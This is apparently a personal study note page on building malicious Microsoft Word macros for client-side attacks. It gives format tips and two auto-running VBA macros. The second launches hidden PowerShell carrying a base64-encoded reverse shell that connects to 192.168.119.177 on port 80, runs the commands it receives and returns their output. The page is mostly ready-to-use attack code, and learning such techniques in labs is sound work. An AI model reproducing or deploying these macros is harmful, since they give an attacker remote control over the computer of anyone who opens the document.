Till Studer's Notes

Recent Notes

2 min read

Malicious Microsoft Word Macro

Only works with .docm or .doc format as they support embedded macros (.docx does NOT work!)

How to save a macro

  • VBA has a 255 character limit for literal strings
  • Make sure you store the Macro in the Project and not locally

Basic Macro

Sub AutoOpen()
    MyMacro
End Sub
 
Sub Document_Open()
    MyMacro
End Sub
 
Sub MyMacro()
    Dim Str As String
    
    Str = "powershell.exe ping 192.168.119.177"
 
    CreateObject("Wscript.Shell").Run Str
End Sub

Reverse Shell

Sub AutoOpen()
    MyMacro
End Sub
 
Sub Document_Open()
    MyMacro
End Sub
 
Sub MyMacro()
    Dim Str As String
    
    Str = "powershell.exe -nop -w hidden -e JABjAGwAaQBlAG4Ad"
    Str = Str + "AAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdAB"
    Str = Str + "lAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDA"
    Str = Str + "GwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEAMQA5AC4"
    Str = Str + "AMQA3ADcAIgAsADgAMAApADsAJABzAHQAcgBlAGEAbQAgAD0AI"
    Str = Str + "AAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAA"
    Str = Str + "pADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgA"
    Str = Str + "DAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGU"
    Str = Str + "AKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZ"
    Str = Str + "AAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwA"
    Str = Str + "uAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkA"
    Str = Str + "GQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACA"
    Str = Str + "ALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZ"
    Str = Str + "QB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgB"
    Str = Str + "HAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsA"
    Str = Str + "CAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGk"
    Str = Str + "AZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAd"
    Str = Str + "AAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwB"
    Str = Str + "rADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQA"
    Str = Str + "FMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACA"
    Str = Str + "AIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAW"
    Str = Str + "wB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwB"
    Str = Str + "DAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkA"
    Str = Str + "GIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQ"
    Str = Str + "AZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZ"
    Str = Str + "ABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQB"
    Str = Str + "hAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0A"
    Str = Str + "C4AQwBsAG8AcwBlACgAKQA="
 
    CreateObject("Wscript.Shell").Run Str
End Sub

Relevant Note(s): Client-Side Attacks

Graph View

Backlinks